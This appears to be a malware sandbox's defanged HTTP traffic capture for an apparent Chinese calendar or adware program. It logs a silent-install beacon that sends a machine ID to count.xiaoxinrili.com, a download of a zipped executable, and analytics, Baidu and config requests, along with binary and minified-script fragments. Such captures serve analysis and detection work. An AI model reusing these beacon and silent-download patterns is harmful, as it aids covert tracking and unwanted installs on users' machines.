"//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.cal

<<< skipped >>>

GET /core.php?web_id=5554906&t=z HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno=

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 751

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:37:54 GMT

Last-Modified: Wed, 14 Jan 2015 11:37:54 GMT

Expires: Wed, 14 Jan 2015 11:52:54 GMT

Age: 812

X-Cache: HIT TCP_MEM_HIT dirn:-2:-2

X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:54 GMT

X-Swift-CacheTime: 900

Via: cache1.de1[0,200-0,H], cache5.de1[0,0]

!function(){var p,q,r,a=encodeURIComponent,b="5554906",c="",d="",e="online_v3.php",f="hzs14.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/javascript..Content-Length: 751..Connection: keep-alive..Date: Wed, 14 Jan 2015 11:37:54 GMT..Last-Modified: Wed, 14 Jan 2015 11:37:54 GMT..Expires: Wed, 14 Jan 2015 11:52:54 GMT..Age: 812..X-Cache: HIT TCP_MEM_HIT dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:54 GMT..X-Swift-CacheTime: 900..Via: cache1.de1[0,200-0,H], cache5.de1[0,0]..!function(){var p,q,r,a=encodeURIComponent,b="5554906",c="",d="",e="online_v3.php",f="hzs14.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.c

<<< skipped >>>

GET / HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: VVV.baidu.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Wed, 14 Jan 2015 11:51:23 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Set-Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: BDSVRTM=0; path=/

Set-Cookie: BD_HOME=0; path=/

Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com

P3P: CP=" OTI DSP COR IVA OUR IND COM "

Cache-Control: private

Cxy_all: baidu 3d02aa32ed472b1d9368b0a1d258b1a7

Expires: Wed, 14 Jan 2015 11:51:19 GMT

X-Powered-By: HPHP

Server: BWS/1.1

BDPAGETYPE: 1

BDQID: 0xe4a43e4c0000c927

BDUSERID: 0

1506e..<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer"><link rel="dns-prefetch" href="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baidu.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><link rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-prefetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title>...........................</title>.<style index="index" id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper{position:relative;_position:;min-height:100%}#head{padding-bottom:100px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overflow:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-style:none}body,form,#fm{position:relative}td{text-align:left}img{border:0}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{

<<< skipped >>>

GET / HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0

HTTP/1.1 200 OK

Date: Wed, 14 Jan 2015 11:51:27 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Cache-Control: private

Cxy_all: baidu 8283a456f4f2fcbe7d033a319ebdf652

Expires: Wed, 14 Jan 2015 11:51:13 GMT

X-Powered-By: HPHP

Server: BWS/1.1

BDPAGETYPE: 1

BDQID: 0xf3ae7d2f0000d9ed

BDUSERID: 0

Set-Cookie: BDSVRTM=0; path=/

Set-Cookie: BD_HOME=0; path=/

Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com

1509e..<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer"><link rel="dns-prefetch" href="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baidu.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><link rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-prefetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title>...........................</title>.<style index="index" id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper{position:relative;_position:;min-height:100%}#head{padding-bottom:100px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overflow:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-style:none}body,form,#fm{position:relative}td{text-align:left}img{border:0}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{

<<< skipped >>>

GET / HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0

HTTP/1.1 200 OK

Date: Wed, 14 Jan 2015 11:51:30 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Cache-Control: private

Cxy_all: baidu 1a71cd95de14792ccc45de0b785c53dc

Expires: Wed, 14 Jan 2015 11:50:53 GMT

X-Powered-By: HPHP

Server: BWS/1.1

BDPAGETYPE: 1

BDQID: 0xd6212c900000d9aa

BDUSERID: 0

Set-Cookie: BDSVRTM=0; path=/

Set-Cookie: BD_HOME=0; path=/

Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com

15152..<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer"><link rel="dns-prefetch" href="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baidu.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><link rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-prefetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title>...........................</title>.<style index="index" id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper{position:relative;_position:;min-height:100%}#head{padding-bottom:100px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overflow:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-style:none}body,form,#fm{position:relative}td{text-align:left}img{border:0}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{

<<< skipped >>>

GET / HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0

HTTP/1.1 200 OK

Date: Wed, 14 Jan 2015 11:51:32 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Cache-Control: private

Cxy_all: baidu 082df6cf533022a4274251c69fa2738d

Expires: Wed, 14 Jan 2015 11:50:52 GMT

X-Powered-By: HPHP

Server: BWS/1.1

BDPAGETYPE: 1

BDQID: 0xb6b4c2b20000cfbf

BDUSERID: 0

Set-Cookie: BDSVRTM=0; path=/

Set-Cookie: BD_HOME=0; path=/

Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com

1514c..<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer"><link rel="dns-prefetch" href="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baidu.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><link rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-prefetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title>...........................</title>.<style index="index" id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper{position:relative;_position:;min-height:100%}#head{padding-bottom:100px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overflow:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-style:none}body,form,#fm{position:relative}td{text-align:left}img{border:0}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{

<<< skipped >>>

GET / HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0

HTTP/1.1 200 OK

Date: Wed, 14 Jan 2015 11:51:52 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Cache-Control: private

Cxy_all: baidu 7b032a5b300d7008530b99d911ef79b0

Expires: Wed, 14 Jan 2015 11:51:18 GMT

X-Powered-By: HPHP

Server: BWS/1.1

BDPAGETYPE: 1

BDQID: 0xd16108b60000ef4e

BDUSERID: 0

Set-Cookie: BDSVRTM=0; path=/

Set-Cookie: BD_HOME=0; path=/

Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com

1514f..<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer"><link rel="dns-prefetch" href="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baidu.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><link rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-prefetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title>...........................</title>.<style index="index" id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper{position:relative;_position:;min-height:100%}#head{padding-bottom:100px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overflow:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-style:none}body,form,#fm{position:relative}td{text-align:left}img{border:0}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{

<<< skipped >>>

GET /stat.htm?id=30085361&r=&lg=en-us&ntime=none&cnzz_eid=162298059-1421232891-&showp=1276x846&t=&h=1&rnd=942284497 HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: hqs5.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine/1.4.1

Date: Wed, 14 Jan 2015 11:51:23 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Tue, 28 May 2013 02:57:17 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /files/conn_engine/2.69.0.5490.zip HTTP/1.1

Range: bytes=0-

User-Agent: WDJConnEngine

Cache-Control: no-cache

Connection: Keep-Alive

Host: fw1.dl.wdjcdn.com

HTTP/1.1 206 Partial Content

Date: Wed, 14 Jan 2015 11:51:37 GMT

Expires: Fri, 13 Feb 2015 11:51:37 GMT

Content-Length: 3383964

Content-Range: bytes 0-3383963/3383964

Content-Type: application/zip

Last-Modified: Thu, 16 Jan 2014 03:30:19 GMT

Cache-Control: max-age=2592000

Connection: Keep-Alive

Server: Tengine/1.4.6

Accept-Ranges: bytes

Fw-Via: DISK HIT from ctl-ha-091-042.fcd, DISK HIT from CTL_JS_002_039.fcd, DISK HIT from CTL_ZJ_146_221.fcd, DISK HIT from CTL_JS_002_040.fcd

PK.........[0D.mg.....x.......wdjconx64.exe.....U.(|.....'`uH.n^....8@t..........#6!.M...d&LpH:..6..5.$.:J#.9..Z...,..";.........V....n..GD...4....s.._z2a.......IM..u....{..s.}...(....c..&A..0......?.w*<....I...G7.o....w\?..Q....}....O...]..].~....;z..y.).eN...L...y..G....3.|......Gn...y........Gn...?...c?..|.....m..:.................*..mAx.?|Z|.[..h......2......k.dF...2...P...|.jxR.p..y.<.aH..'.{....$.Gj.4|.I=....'C. ..]......>W}.....i.._g.....eA.Dc.:3M]....5....-.....[...e..#.......)..N.d.z...7.kp....C...>.?...1......w...t.o..J&(...>....0....>..!....n...,...k?g.;.|.......L|...z.\...S..8\..W..yG.g..%.~.Y..........zW........py.r#....T_...k.>...]..........1..1....p..q..m\.Y...c...~;.X..a.S.u..!.{W...............{..>.i[..vo.......`c.]XB...>....|.|.i.....>....#..=....cjc......U.....{...|..x..9.:.b|...n....5&./...;..,.m,..q..[..,........m.........k..b.:....}.^...q{c.V......[..?..XNT......?.X.[...#Vz.90?.z....:....w.U..Y...i.W..hG.............-..Vhl...5|W......vS.........wm.M.do...i...]...?....2.n.w.S.J......9...../.>.7..2.M...(Q.....,.n;............./j...g..7.........?.M.7\.}.....mg...%..'......T..w....Q.....O.}a.k.H......`Z.!....-.l..@JJ...].BB?..#.q..b.l ..PF.Q...}......a.......;.3*........1.e.......7.....F.e..F....0..,.`...................%...G.Y|............=..2.X..P.?..$4HK#...F..E^..8...,.!0.m.....Q.{y..I...qi$.y....o.p.:n_..z.ji.....(...G7#<.xL..Ah#..'N.....T.j..........$.8.}.......;.!5y.s$-X.....|....*=S.^['....'....8..c..!...j........<...........[.......6...|<?./.g

<<< skipped >>>

GET /metro?sid=000C29FD55AD&s=B867EF90584DBE7ADA2C745D5A27E8C6&type=silent&appname=w5DCocOQw4LDiMOVw4DDug==&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&pn=adslist&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno= HTTP/1.0

Host: count.xiaoxinrili.com

Keep-Alive: 300

Connection: keep-alive

User-Agent: AppName:........; Compiled:201412311429; WinVer:5.01.2600 paX86; AdapterCount:1;

HTTP/1.1 200 OK

Server: nginx/1.4.2

Content-Type: text/html; charset=UTF-8

Connection: close

X-Powered-By: PHP/5.4.17

Set-Cookie: laravel_session=ho6eqvah97serbkjg5p59n79h1; expires=Wed, 14-Jan-2015 13:49:45 GMT; path=/; HttpOnly

Set-Cookie: laravel_session=ho6eqvah97serbkjg5p59n79h1; expires=Wed, 14-Jan-2015 13:49:45 GMT; path=/; httponly

Cache-Control: private, must-revalidate

Date: Wed, 14 Jan 2015 11:49:45 GMT

pragma: no-cache

expires: -1

0..

GET /stat.php?id=5614889 HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s9.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 10072

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:11:31 GMT

Last-Modified: Wed, 14 Jan 2015 11:11:31 GMT

Cache-Control: max-age=5400,s-maxage=5400

Age: 2424

X-Cache: HIT TCP_MEM_HIT dirn:6:786858085

X-Swift-SaveTime: Wed, 14 Jan 2015 11:11:32 GMT

X-Swift-CacheTime: 5399

Via: cache1.de1[0,200-0,H], cache8.de1[0,0]

(function(){function k(){this.c="5614889";this.R="z";this.N="";this.K="";this.M="";this.r="1421233891";this.P="hzs10.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=5614889");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if("[

<<< skipped >>>

GET /stat.php?id=5467330&web_id=5467330 HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s23.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 10072

Connection: keep-alive

Date: Wed, 14 Jan 2015 10:54:50 GMT

Last-Modified: Wed, 14 Jan 2015 10:54:50 GMT

Cache-Control: max-age=5400,s-maxage=5400

Age: 3386

X-Cache: HIT TCP_MEM_HIT dirn:0:415567230

X-Swift-SaveTime: Wed, 14 Jan 2015 10:54:50 GMT

X-Swift-CacheTime: 5400

Via: cache8.de1[0,200-0,H], cache7.de1[0,0]

(function(){function k(){this.c="5467330";this.R="z";this.N="";this.K="";this.M="";this.r="1421232890";this.P="hzs23.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=5467330");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if("[

<<< skipped >>>

GET /appImg/appimg.txt HTTP/1.1

User-Agent: HOST

Host: update.xiaoxinrili.com

Cache-Control: no-cache

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Thu, 20 Mar 2014 02:35:58 GMT

Accept-Ranges: bytes

ETag: "75d4f20e543cf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:29 GMT

Content-Length: 0

....

GET /appImg/AppCloud4.2.xml HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1

HTTP/1.1 200 OK

Content-Type: text/xml

Last-Modified: Wed, 23 Apr 2014 03:16:06 GMT

Accept-Ranges: bytes

ETag: "9bff765da25ecf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:30 GMT

Content-Length: 2817

<?xml version="1.0" encoding="gb2312"?>..<root>.. <item genre="set" skinurl="" md5="" />.. <item genre="tool" uitype="noie_rili" name="...." ui_name="beiwang" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. <item genre="tool" uitype="noie_rili" name="...." ui_name="tixing" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. <item genre="tool" uitype="noie_rili" name="...." ui_name="guanji" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. <item genre="arder" uitype="ie" name="...." ui_name="yinyue" comline="926,600,0,....,yinyue_rilicla,1,hXXp://update.redshu.com/daohang/xck.html?1,hXXp://fm.baidu.com/?embed=ps&bd_user=3590635477&bd_sig=7ecf52d8702148fffdf014bb7cde9c84&canvas_pos=platform" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />..<item genre="tool" uitype="ie" name="......" ui_name="jisuanqi" comline="555,620,0,......,jisuanqi_rilicla,0,hXXp://update.redshu.com/daohang/xck.html?6,hXXp://apps2.bdimg.com/store/static/kvt/3e9b470e8b9fceaa66d46a935b45518e.swf" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" /> .. <item genre="live" uitype="ie" name="...." ui_name="kuaidi" comline="550,425,0,....,kuaidi_rilicla,0,hXXp://update.redshu.com/daohang/xck.html?2,hXXp://baidu.kuaidi100.com/index2.html?" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. <item genre="live" uitype="noie_rili" name="...." ui_name="jiaqi" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />.. &lt

<<< skipped >>>

GET /PopBoxSmall.txt HTTP/1.1

User-Agent: HOST

Host: update.xiaoxinrili.com

Cache-Control: no-cache

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Wed, 19 Nov 2014 05:36:39 GMT

Accept-Ranges: bytes

ETag: "b64ab2caba3d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:30 GMT

Content-Length: 10

1,120,7200....

GET /PopBoxBig.txt HTTP/1.1

User-Agent: HOST

Host: update.xiaoxinrili.com

Cache-Control: no-cache

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Thu, 12 Jun 2014 07:47:50 GMT

Accept-Ranges: bytes

ETag: "3c8dfd9b1286cf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:31 GMT

Content-Length: 11

0,300,14400....

GET /update.txt HTTP/1.1

User-Agent: HOST

Host: update.xiaoxinrili.com

Cache-Control: no-cache

